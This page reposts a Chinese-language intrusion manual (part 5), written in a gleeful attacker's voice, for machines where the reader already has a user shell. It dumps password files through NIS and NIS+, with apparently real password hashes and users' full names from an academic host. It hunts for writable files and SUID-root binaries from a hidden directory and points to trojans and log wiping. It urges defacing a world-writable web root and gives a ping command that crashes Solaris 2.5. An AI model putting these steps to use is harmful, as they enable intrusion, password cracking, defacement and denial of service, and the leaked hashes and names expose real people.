当前位置:Linux教程 - Linux - 网络入侵实用战术手册(5)

网络入侵实用战术手册(5)



        
    作者[samsa]


    四、溜门撬锁

    一旦在目标机上获得一个(普通用户)shell,能做的事情就多了

    1) /etc/passwd , /etc/shadow

    能看则看,能取则取,能破则破

    1.1) 直接(no NIS)

    $ cat /etc/passwd
    ......
    ......

    1.2) NIS(yp:yellow page)

    $ domainname
    cas.ac.cn
    $ ypwhich -d cas.ac.cn
    $ ypcat passwd

    1.3) NIS+

    ox% domainname
    ios.ac.cn
    ox% nisls
    ios.ac.cn:
    org_dir
    groups_dir
    ox% nisls org_dir
    org_dir.ios.ac.cn.:
    passwd
    group
    auto_master
    auto_home
    auto_home
    bootparams
    cred
    ethers
    hosts
    mail_aliases
    sendmailvars
    netmasks
    netgroup
    networks
    protocols
    rpc
    services
    timezone
    ox% niscat passwd.org_dir
    root:uop5Jji7N1T56:0:1:Super-User:/:/bin/csh:9841::::::
    daemon:NP:1:1::/::6445::::::
    bin:NP:2:2::/usr/bin::6445::::::
    sys:NP:3:3::/::6445::::::
    adm:NP:4:4:Admin:/var/adm::6445::::::
    lp:NP:71:8:Line Printer Admin:/usr/spool/lp::6445::::::
    smtp:NP:0:0:Mail Daemon User:/::6445::::::
    uucp:NP:5:5:uucp Admin:/usr/lib/uucp::6445::::::
    listen:*LK*:37:4:Network Admin:/usr/net/nls::::::::
    nobody:NP:60001:60001:Nobody:/::6445::::::
    noaccess:NP:60002:60002:No Access User:/::6445::::::
    guest:NP:14:300:Guest:/hd2/guest:/bin/csh:10658::::::
    syscd:qkPu7IcquHRRY:120:10::/usr/syscd:/bin/csh:::::::
    peif:DyAkTGOg/2TCY:819:800:Pei Fei:/home/peif:/bin/csh:10491::::::
    lxh:T4FjqDv0LG7uM:510:500:Liu Xuehui:/home/lxh:/bin/csh:10683::::::
    fjh:5yPB5xLOibHD6:507:500:Feng Jinhui:/home/fjh:/bin/csh:10540::::::
    lhj:UGAVVMvjp/9UM:509:500:Li Hongju:/home/lhj:/bin/csh:10142::::::
    ....

    (samsa:gotcha!!!)

    2) 寻找系统漏洞

    2.0) 搜集信息

    ox% uname -a
    SunOS ox 5.5 Generic sun4d sparc SUNW,SPARCserver-1000
    ox% id
    uid=820(ywc) gid=800(ofc)
    ox% hostname
    ox
    ox
    ox% domainname
    ios.ac.cn
    ox% ifconfig -a
    lo0: flags=849 mtu 8232
    inet 127.0.0.1 netmask ff000000
    be0: flags=863 mtu 1500
    inet 159.226.5.188 netmask ffffffc0 broadcast 159.226.5.191
    ipd0: flags=c0 mtu 8232
    inet 0.0.0.0 netmask 0
    ox% netstat -rn
    Routing Table:
    Destination Gateway Flags Ref Use Interface
    -------------------- -------------------- ----- ----- ------ ---------
    127.0.0.1 127.0.0.1 UH 0 738 lo0
    159.226.5.128 159.226.5.188 U 3 341 be0
    224.0.0.0 159.226.5.188 U 3 0 be0
    default 159.226.5.189 UG 0 1198
    ......

    2.1) 寻找可写文件、目录

    ox% cd /tmp
    ox% cd /tmp
    ox% mkdir .hide
    ox% cd .hide
    ox% ls -ld `find / \\( \\( -type d -o -type f \\) -a \\( -perm -0002 -o -group 800 \\

    -a -perm -0020 \\) \\) -print` >.wr

    (samsa:wr=writables:可写目录、文件)

    ox% grep \"^d\" .wr > .wd

    (samsa:wd=writable directories:目录)

    ox% grep \"^-\" .wr > .wf

    (samsa:wf=writable files:普通文件)

    ox% ls -l `find / \\( -perm -4000 -a -user root \\) -print` >.sr

    (samsa:sr=suid roots)

    2.1.1) 系统配置文件可写:e.g.pam.conf,inetd.conf,inittab,passwd,etc.
    2.1.2) bin 目录可写:e.g./usr/bin,/usr/local/bin,etc. (see:Trojan horses)
    2.1.3) log 文件可写:e.g./var/adm/wtmp,/var/adm/messges,etc.(for track-erasing)

    2.2) 篡改主页

    绝大多数系统 http 根目录下权限设置有误!不信请看:

    ox1% grep http /etc/inetd.conf
    ox1% ps -ef | grep http
    http 7538 251 0 14:02:35 ? 0:02 /opt/home1/ofc/http/httpd/httpd -f /opt/home1/ofc/http/httpd/conf/httpd.conf
    http 7567 251 0 15:16:46 ? 0:01 /opt/home1/ofc/http/httpd/httpd -f /opt/home1/ofc/http/httpd/conf/httpd.conf
    root 251 1 0 May 05 ? 3:27 /opt/home1/ofc/http/httpd/httpd -f /opt/home1/ofc/http/httpd/conf/httpd.conf
    ......
    ox1% cd /opt/home1/ofc/http/httpd
    ox1% ls -l |more
    total 530
    drwxrwxrwx 11 http ofc 512 Jan 18 13:21 English
    -rw-rw-rw- 1 http ofc 8217 May 10 09:42 Welcome.html
    -rw-rw-rw- 1 http ofc 8217 May 10 09:42 Welcome.html
    drwxr-sr-x 2 http ofc 512 Dec 24 15:20 cgi-bin
    drwxr-sr-x 2 http ofc 512 Mar 24 1997 cgi-src
    drwxrwxrwx 2 http ofc 512 Jan 12 15:05 committee
    drwxr-sr-x 2 root ofc 512 Jul 2 1998 conf
    -rwxr-xr-x 1 http ofc 203388 Jul 2 1998 httpd
    drwxrwxrwx 2 http ofc 512 Jan 12 15:06 icons
    drwxrwxrwx 2 http ofc 3072 Jan 12 15:07 images
    -rw-rw-rw- 1 http ofc 7532 Jan 12 15:08 index.htm
    drwxrwxrwx 2 http ofc 512 Jan 12 15:07 introduction
    drwxr-sr-x 2 http ofc 512 Apr 13 08:46 logs
    drwxrwxrwx 2 http ofc 1024 Jan 12 17:19 research

    (samsa:哈哈!!差不多全都可以写,太牛了,改吧,还等什么??)

    3) 拒绝服务(DoS:Denial of Service)

    利用系统漏洞捣乱

    e.g. Solaris 2.5(2.5.1)下:

    $ ping -sv -i 127.0.0.1 224.0.0.1
    PING 224.0.0.1 56 data bytes

    (samsa:于是机器就reboot乐,荷荷)
    发布人:netbull 来自:黑客专家